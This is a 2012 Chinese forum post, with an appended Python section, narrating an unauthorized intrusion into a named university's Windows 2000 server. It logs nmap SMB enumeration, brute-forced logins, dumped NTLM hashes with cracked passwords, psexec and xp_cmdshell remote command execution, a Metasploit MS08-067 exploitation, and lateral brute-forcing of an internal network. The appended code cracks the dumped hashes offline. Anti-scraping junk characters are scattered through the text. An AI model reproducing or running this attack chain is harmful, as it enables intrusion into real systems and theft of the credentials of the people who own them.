nmap+msf intrusion of Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

# E  Z' u2 q% c) @1 Z$ p4 [" Qroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本6 b: g% g2 c- i
, |) F$ E* j3 ~* G: F+ N) e
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse$ B0 _% W5 |" V3 J- A; E4 u

; [* }7 w* j5 l0 R; p! Q-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
8 Y* R* k! S* n& Y% x/ H# t$ @1 e  V" O; L; D
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse6 E, x& k$ x" B: h. p8 Z
8 W6 G/ `7 e: z6 T* i+ Y
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse1 b$ x& s7 O% F7 y! _0 h

/ B% ]$ u$ D# r; m4 E1 t# N-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
+ T7 D* l) w* L) U' j# U2 Z5 {$ K9 w
" p2 T! `. r' ^2 Z6 u-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse% u* H( {* a+ z. |
' ^1 e6 [, k) F# _+ E  [8 m6 Z
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
, I8 |' E2 x0 K9 _2 u) K9 Q3 @5 |
8 K; T9 y, k9 w/ w' R-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse6 O" `: U- C' t+ [# w

& M% b1 E1 h7 Q1 k4 A-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
! S1 Z6 R; t  {& J7 A9 R6 B) ~7 E
8 X* i2 a7 @- g# N-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
& b6 t0 w  u+ P1 v! J' h+ I! f# M8 [# L0 k
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
0 {: U/ o2 U4 ^! a# o- Z! t2 O9 _' C! w6 O; X0 E7 I
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
& w  m) S9 i8 D* ^; e* ?) d, D3 ^, i
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse  i, m2 o0 ~, c+ {

! v4 f( O' K  j2 q* B: }- L-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
5 a. l, p& d* I2 F# B. W- R# o+ k5 y7 K' h# }* [5 \
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
$ [0 k( S7 y4 ?! U/ S# S  X8 ?2 ^
0 A& Q! ]" l( ~7 `+ R* N3 croot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   " R' n# j8 {/ V5 x
8 X  R3 u/ K* z6 e" ?5 Z
//此乃使用脚本扫描远程机器所存在的账户名/ \3 k5 R  g: U, _+ \

. O! S6 T. J; t# z* |, }" G0 OStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST8 S% @/ a: i/ y- \
$ x+ Q0 s0 [$ {4 x3 N$ u8 [6 Z- L4 u& R
Nmap scan report for bogon (202.103.242.241)6 d/ W9 v* u" [6 j" Y5 A0 P5 ?
4 Z4 Q" U( \) m
Host is up (0.00038s latency).$ j1 Y. j0 ^! T; X9 A

8 H9 Z% [. j) ZNot shown: 993 closed ports
3 {* h. [% q: U4 [* s7 N! e( d1 A( W# i
PORT     STATE SERVICE& W( ]1 S( e& q' U
' Y& W& _. M5 q- l- R
135/tcp  open  msrpc% }1 Z8 H5 \7 h2 ^+ M
$ A6 Y6 Z, _6 {2 ]" ^1 P
139/tcp  open  netbios-ssn
+ F" A3 k5 X1 N4 R# C  \+ M
: v" P  Q/ D! c445/tcp  open  microsoft-ds, C. ~, l! X% H! {2 w0 E8 [: A

- M* b& g1 P6 z7 e+ G1 _- g% o1025/tcp open  NFS-or-IIS
9 ?' b. C8 e! X  u
, Y% p8 h' X# H! X  N1026/tcp open  LSA-or-nterm( I1 d4 V$ D2 ~. x, R0 g' g
' P9 l$ b+ l6 e+ e/ o/ R
3372/tcp open  msdtc8 v9 k' R1 N/ u7 _' [  b

' {& }- Z) }8 ?* K( s$ E( `) u" o9 j3389/tcp open  ms-term-serv
% r* R. A( Z$ y9 l% W* h
5 V7 _) w6 i& e" QMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 W5 f( D0 {& w$ m  D

7 Y9 p$ d5 n, {6 E  mHost script results:3 v( N' W- E: J: e  o
+ Y4 [" U) |& L1 T: h
| smb-enum-users:
# p6 A, v, i1 K' C* W
( J$ B6 `2 s  }0 Y+ k, N5 W4 ||_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
, k7 s8 |% `# `+ F2 y- ]! G; ~& w" S. Q7 [5 F
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds7 H7 }) Y9 Y3 _/ x4 p1 g" X2 J2 C

7 _4 @/ [. U: G7 D( Q4 c  Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
0 A4 Z) h. m: ~. |2 C
2 @5 ?0 q2 ]4 ^, S7 y! V//查看共享
  F/ F, C& Y4 f. @
5 R, q/ {. Z) F( M: MStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST5 k/ A9 y( T( B0 q0 B0 A* T

- M# O' F& x  O5 _$ Y6 BNmap scan report for bogon (202.103.242.241)# I4 d* i' Z! Q; q- ~

  c  u' b/ k" \/ g3 `4 n) ^; ~Host is up (0.00035s latency).
  c! `+ R) v! |% x5 ^6 d9 r6 g
3 J0 H2 H- p8 Y: h# mNot shown: 993 closed ports
  I2 M6 b# D9 T9 ]1 j9 r4 U" [% h. n6 B5 L+ A- p( E$ P
PORT     STATE SERVICE
' `% Q6 F  e* f' g3 D3 u: o$ }0 `# m! n% n  \9 W
135/tcp  open  msrpc" a' X% \8 G3 M/ {+ V

4 V7 @( e/ M( J+ J( }139/tcp  open  netbios-ssn( H; j* d% F( F/ k/ z0 l2 F% r

4 s. x- j& o  i9 c: M# ]# I445/tcp  open  microsoft-ds
7 t/ h7 F  }3 o3 w
- g! m( U( o3 z3 t% r; A1025/tcp open  NFS-or-IIS$ Y4 V- I8 {/ _: b7 m; m. F

6 B1 ~3 s1 p! C7 W1026/tcp open  LSA-or-nterm: e8 E* d$ i; Z0 t: c" C4 Q7 g
! v1 o) r* @2 X4 B
3372/tcp open  msdtc
/ R3 R. f9 w  v
6 C) X$ r+ ]8 T2 q+ n# y7 E0 W7 L/ `1 {' T/ G3389/tcp open  ms-term-serv
% R8 l4 ^+ c8 I/ b6 t
  u6 ~/ a; u3 x7 D7 ~8 ~9 X% A/ IMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! m! C+ W3 ~8 w
3 W2 ?5 E; {5 S4 v, S, @) aHost script results:
9 ]3 L- o( ^& W4 n
1 d& o, e7 C( G" O| smb-enum-shares:: |. k3 ~% C- m/ K7 C

  i9 g2 ~, `. ?|   ADMIN$0 N8 K. K; b! }0 Y/ ?  j; L
; S1 V* U* k2 R+ d
|     Anonymous access: <none>
3 n" d7 m0 p  j9 T; \2 B* b- ]; N' u$ ]( w
|   C$/ R1 U2 x* K+ d! r/ `
) ]9 B$ T) _* f: R1 \$ }
|     Anonymous access: <none>1 [4 L) Q, F! _" \9 y

% ?( Q6 t3 f& _- C8 C* Y|   IPC$
" X! F8 l% J% q5 x3 s: x- A3 z( ]/ ], |4 A' n
|_    Anonymous access: READ4 h/ D& X) T/ Z" o0 @+ N

/ C9 T. R+ n+ tNmap done: 1 IP address (1 host up) scanned in 1.05 seconds3 C( ^- V$ K0 k& X( n7 ]: |6 ~

, h. e& U$ Q, i+ z  k# M$ [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241      
3 f& }8 |4 I$ M. o3 I5 a$ P. c8 F- q' f4 i
//获取用户密码
3 b0 h2 ]& X9 X; a! `8 q, ]3 \, k8 y$ o- `3 H, A+ m  J* |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
- v+ ^" t. q) g5 y/ Q  `/ R9 n7 o; k  J3 W( E" k+ ?; W
Nmap scan report for bogon (202.103.242.2418)
, {- Y) d  p2 ?% N1 z3 V- Z; a2 O! q4 h
3 s1 T: d9 R: B8 tHost is up (0.00041s latency)./ c5 c  o2 o% l2 u' J
& y+ L" ?# O' i' }
Not shown: 993 closed ports2 }9 W# _1 S7 I- g3 U& m' O

$ c9 D' \5 Z" R. p1 E1 @! `PORT     STATE SERVICE7 ~# x: O  @6 q4 x

6 Y+ N  ?: v: C3 Y: c7 c135/tcp  open  msrpc  T4 ^- R) f/ A1 z; Q
3 ^# l2 b. B1 w. g. P  `2 `
139/tcp  open  netbios-ssn
2 A: w9 K; F" B# S
# Y, s9 S7 M8 q) K445/tcp  open  microsoft-ds& }! d3 w9 i' W: J; V( q# H1 e

7 c, \% [' a) J$ F) Y& w1025/tcp open  NFS-or-IIS- W) o* x2 B) U, R: N; V, V) }4 K

4 l7 b, y" D! V& u) A0 A% g: Y+ j1026/tcp open  LSA-or-nterm8 a6 C8 Z' Q# p& C  B; p

. \' `7 N$ N0 q. |' m5 g/ a% t3372/tcp open  msdtc
. S7 z  g' i6 R+ C% Y' ?5 z. L" ~( i" _  g1 W- J8 k" a
3389/tcp open  ms-term-serv; D+ @0 `5 {, n5 Y( w/ |, [# y
" j- U* F0 |3 m) J, B: {
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems); p" V) g5 T  n
6 f, C- j- \1 ?7 E  r9 r
Host script results:: M8 r) k5 Q. K. k' t0 t9 ]
8 W9 W8 p7 Y! y- U! Y8 D. b, P
| smb-brute:! p4 e3 R; O" W/ ~

- J9 R' P9 c5 V+ ~administrator:<blank> => Login was successful$ a& F3 f% z( R8 ^. d, y

* C! Y  Z' \& W/ n9 @! d9 |- E: s|_  test:123456 => Login was successful
+ \5 @. l" Z4 L/ e5 M' U: H4 u4 S$ K8 J: l
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
) v# |/ i# R/ X& `! P" N. `7 d
! ?$ g' C3 Y) Z$ Q5 M/ e& s1 Mroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash" o7 G5 N' {* I/ t7 e/ b3 l% C
+ @0 g! d, @/ E- Y) f6 m
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data* U1 i+ V  c! a* p  N8 ]* }' @

+ g) z7 C/ z1 h4 T, hroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse0 |2 o/ A6 i0 Z( h0 S
8 e/ Z6 I3 m0 E) _2 T  P
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139& }9 Z$ T  y! }3 u# ]$ k# m  |

" b4 h% |/ \7 t6 P9 W, c: l" _0 GStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST& S% J4 a  K/ M/ m/ o
6 q; [+ w& v  l, y8 T
Nmap scan report for bogon (202.103.242.241)7 N  j& W$ j/ f+ `& p, Y$ g
- C- Q: F) i$ J3 d. ]
Host is up (0.0012s latency).
$ E/ U; y$ n7 u9 Y& K! Y6 @
' k8 v$ F* D( r. `6 C/ tPORT    STATE SERVICE7 j4 M( {7 S# k$ C0 s0 P
' D# e, q. K/ h8 n
135/tcp open  msrpc
& e( k) T) o/ P, a$ k- P8 t& D
$ W4 ^/ t5 A+ c139/tcp open  netbios-ssn, U* j0 T3 X) U2 G! r& v
8 M( U0 ]) G3 {7 ]  }- i! i
445/tcp open  microsoft-ds$ s/ m# u& Z- C3 j1 r, g
  }# g6 w- a% m! u5 r
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 C8 e* M1 R! `% T( q0 Q
$ [* M: h* y( p4 r9 K
Host script results:
! p% t# e; ~7 q3 T
- B$ f; \6 }# S- A# n" z| smb-pwdump:) s. A- d( K: z9 B7 {
  @1 w1 J7 ]) M# w6 _# z6 ~& {: v
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 m6 d& O( b# M
& z4 h# J- t! N' c; \- v6 D0 h3 Y
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************7 V* J) d0 U/ b; m7 T/ b
/ f% f8 s8 g# N2 e: S
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0 C" Y. L: Z! G# W5 e# Z1 x; i5 G1 d. z9 \4 ?5 C
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
2 ]3 [* N) s+ [/ d) |
! R* h0 L" @# R3 E3 HNmap done: 1 IP address (1 host up) scanned in 1.85 seconds" @6 j! I9 ~$ S1 a
$ x9 w8 \0 O5 M. e  Q# p
C:\Documents and Settings\Administrator\Desktop>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\Desktop\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and run a command
/ K+ K2 ]- l! U4 S
/ m2 C/ B- M# Z7 f) U5 d: D) Broot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
" S5 }3 J. J7 v5 d. m& F# w6 F) g- e/ i" e5 j; [1 o1 k. D
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
" h* s6 C2 M8 x
5 d: r; ~5 g( vNmap scan report for bogon (202.103.242.241)
8 g# D) V0 U2 Y+ g, t6 |+ g
3 x1 Y  c+ T9 p0 EHost is up (0.00046s latency).
3 W. M( N+ c6 \& _4 M; e; `  H. u' }1 s4 |5 x
Not shown: 993 closed ports
, q, e, @+ f. \/ n5 d* R
+ S) m: G2 i& MPORT     STATE SERVICE- U  T5 b& Z1 }* L0 f+ r* f

7 \8 Z# }" b* e5 A6 Y135/tcp  open  msrpc
0 c) T1 K4 I' b6 W! [5 c3 _
  z  ~- l. z3 @2 b: p, w139/tcp  open  netbios-ssn& Q! U! c- ^; f' d& H, e
4 P% a2 j! Q! V# u3 j  D- W
445/tcp  open  microsoft-ds+ p' y0 i/ a" \
9 z4 M, G0 a  K) G0 P( o
1025/tcp open  NFS-or-IIS0 I$ K0 J, j( W2 M6 y1 b9 W
- [4 Q! Z6 \" m2 K
1026/tcp open  LSA-or-nterm8 X, _! J/ @, Q
  Z3 Y& u0 I" N, \+ ]+ N5 a6 q
3372/tcp open  msdtc
' r8 B+ G6 K& k4 I5 q4 a5 ~
! w5 Y* \  \( D2 |3389/tcp open  ms-term-serv
7 V+ c; K' k3 G: T5 d' I8 {# s: N+ y4 R+ G8 ^) L
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 W% |4 K4 r: w& n  q8 ]1 E; Q
3 c* X$ |  G# gHost script results:
) ^0 Z, f2 o! ~1 C& a
+ ]0 G( p1 V* x) j| smb-check-vulns:1 B$ F# f1 v4 v8 r& b& m) w. C

2 W, X5 X7 N7 u( ~|_  MS08-067: VULNERABLE! {6 c# ?7 E  u" `2 S: ^
6 d: }4 W( @4 j* c
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds0 y# j4 @* p: t& C

1 S) ^2 ~8 \2 w% `1 h, P6 U0 @root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出2 n( e: q8 b9 T3 |: i

7 P3 m* y( A; O, h$ @- D7 Bmsf > search ms08
$ g5 M7 V1 t. K0 m$ M( [4 Z8 G$ E, |3 l+ C* s0 @; U5 ~: v
msf > use exploit/windows/smb/ms08_067_netapi5 P* e* Q) j. c, x5 c+ x- j: N
; ]' U7 T/ a, g
msf  exploit(ms08_067_netapi) > show options) f1 D, I, |( J- U2 n, v

" C* R7 g& @0 t, n" umsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
4 m' `8 q) e' b- m, O7 {# u& V8 e% S/ `5 D# S4 b8 S7 F. c
msf  exploit(ms08_067_netapi) > show payloads
0 ~2 v! b" p0 z  c6 A+ x: _5 o, |% r, H& i" ^* j
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp- N" R( Z0 P6 G# m& g! e) B
" f: z9 c, p+ p; i9 a  J) Y
msf  exploit(ms08_067_netapi) > exploit
7 I- g7 l1 ~+ D: K2 J
; }1 j" P: ~  R2 j% s' F1 smeterpreter >% R3 w5 F( p* [8 t9 c
" J3 a& `3 ^: c- i" a! p
Background session 2? [y/N]  (ctrl+z)- ~- v+ {4 R9 E/ F( m& f  |$ q
! W+ L' c. x  x  e6 h( U
msf  exploit(ms08_067_netapi) > sessions -l+ J( M0 a! J; D% [/ b% z7 ?

, K' Y# O0 m4 O, m3 X$ droot@bt:/usr/local/share/nmap/scripts# vim usernames.txt; x( E6 O8 i. k1 o' k) n
& h: p1 H. V6 O5 x  `( \9 D4 Y) x6 P
test
3 ?- P4 P$ T. {+ e+ B$ |/ Y7 Y  y' h; U/ H1 C. ]% ^* O4 q
administrator
& g$ h' m0 h' F* b# b" Q; L0 c: z4 l; |+ m5 I0 q) }, s- q" f
root@bt:/usr/local/share/nmap/scripts# vim password.txt0 f( u0 i5 @8 ?9 O8 X

/ F, V0 o% G+ M- I6 d1 w# i44EFCE164AB921CAAAD3B435B51404EE5 t( O% ]6 m# p, @7 B% m% B

9 E5 F' S7 v2 M* ~5 D0 iroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 3 z, Z) T% n$ c! _" }. d

& e3 w( N. C, G) W1 r0 | //利用用户名跟获取的hash尝试对整段内网进行登录
/ i8 C( T0 M" q( o8 ?3 b- O, j0 S& F6 k8 M
Nmap scan report for 192.168.1.105
2 l/ t$ D+ ^% B2 n6 _7 B- V/ N+ o
+ z. E7 h% s$ x$ FHost is up (0.00088s latency).
- q9 S, n2 f/ L* `( e2 P9 l7 [  d. q; n$ G1 W  c; S
Not shown: 993 closed ports8 y2 A; _  l. R; u7 t

- Y2 V8 T& C; u# @, v- WPORT     STATE SERVICE( G, u0 G  T' P, H$ h
0 I1 O/ D+ l9 e
135/tcp  open  msrpc
1 a/ K9 E* \$ L* ]( F) _& s
% W, {5 a5 h/ A" D139/tcp  open  netbios-ssn+ M4 \2 C! e3 J1 p3 K  R2 {0 v

! j! a4 q+ ]. ?445/tcp  open  microsoft-ds' A# }! ^) H, j! w* f$ J
7 W9 ?' B! A' C( _/ v6 u
1025/tcp open  NFS-or-IIS
  y1 ~' E4 o; ?1 ^" O- ~5 G9 K% C" R1 W1 M1 A) k
1026/tcp open  LSA-or-nterm
& B. Y. N- t" O  D: n5 \$ _  q" s3 `$ {& d( ]# {
3372/tcp open  msdtc4 b  d2 W0 B3 w: W1 r( C3 U

8 ]; z8 ~1 P* l3 B& C3389/tcp open  ms-term-serv/ j& M4 W! @: J8 f  L

1 t. J* H& }  g& r* l# `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)* D$ I& }; x0 K6 ~

" o( L! X; J1 w) M8 N& MHost script results:8 l1 l* b8 l7 m
* }9 A& \& G: {' L! U1 f
| smb-brute:1 Q  P% [( Z6 C/ t1 F

& y9 @7 v: d2 Y; y5 P|_  administrator:<blank> => Login was successful# _  X( s! ^" O, l$ c5 {
! y) h! {: t' f- f* y/ Y
攻击成功,一个简单的msf+nmap攻击~~·1 Q9 l. b9 x0 ~. U+ a8 C
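The smb-brute result (test:123456) and the smb-pwdump hashes for the same account can be checked against each other offline, without touching the host again. The Python below is an added example and is not part of the original post: it implements MD4 inline (RFC 1320, because hashlib's md4 is disabled in many OpenSSL 3 builds), derives the NT hash of candidate passwords, parses the pwdump lines quoted from the post, reads off what the LM hash alone reveals, and runs a constructed four-word dictionary against the NT hashes. The wordlist and all function names are this example's own assumptions.

```python
"""Offline check of smb-pwdump output against a small dictionary (added example)."""
import struct


# --- MD4 (RFC 1320), needed because hashlib.new("md4") is often unavailable ---
def _rotl(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    # pad: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, range(16), (3, 7, 11, 19), 0),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, order, shifts, const in rounds:
            for i, k in enumerate(order):
                a = _rotl(a + fn(b, c, d) + X[k] + const, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers: ABCD -> DABC -> CDAB -> BCDA
        A, B, C, D = ((A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF,
                      (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF)
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4 over the UTF-16LE password (case-sensitive)."""
    return md4(password.encode("utf-16-le")).hex().upper()


# LM hashes DES-encrypt a constant under each 7-byte half of the uppercased,
# 14-byte-padded password; an empty half always yields this well-known block.
LM_EMPTY_HALF = "AAD3B435B51404EE"
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"   # MD4 of the empty string


def parse_pwdump(lines):
    """Parse 'user:rid => LM:NT' lines as printed by smb-pwdump.nse / pwdump6."""
    out = {}
    for line in lines:
        line = line.strip().lstrip("|_ ")
        if "=>" not in line:
            continue
        ident, hashes = [p.strip() for p in line.split("=>", 1)]
        user = ident.split(":")[0]
        lm, nt = hashes.split(":", 1)
        if lm.startswith("NO PASSWORD"):        # pwdump6 marker for a blank password
            lm, nt = LM_EMPTY_HALF * 2, NT_EMPTY
        out[user] = (lm.upper(), nt.upper())
    return out


def describe_lm(lm: str) -> str:
    """What the LM hash gives away before any cracking."""
    if lm == LM_EMPTY_HALF * 2:
        return "blank password"
    if lm[16:] == LM_EMPTY_HALF:
        return "password is 7 characters or fewer"
    return "password is 8-14 characters"


def crack(entries, wordlist):
    """Dictionary attack on the NT hashes; returns {user: recovered password}."""
    table = {nt_hash(w): w for w in wordlist}
    found = {}
    for user, (_lm, nt) in entries.items():
        if nt == NT_EMPTY:
            found[user] = ""
        elif nt in table:
            found[user] = table[nt]
    return found


# Copied from the smb-pwdump run in the post above.
PWDUMP_OUTPUT = [
    "| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************",
    "| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************",
    "| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4",
    "|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2",
]
WORDLIST = ["password", "123456", "admin", "test"]   # constructed for this example

if __name__ == "__main__":
    entries = parse_pwdump(PWDUMP_OUTPUT)
    for user, (lm, _nt) in entries.items():
        print(f"{user:15} {describe_lm(lm)}")
    print(crack(entries, WORDLIST))
```

The second LM half of the test account is the empty-chunk constant, so the password is known to be at most 7 characters before a single guess is made; the NT hash then confirms 123456 directly. TsInternetUser's hash is not in the constructed list and stays uncracked, which is the expected outcome for a dictionary this small.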
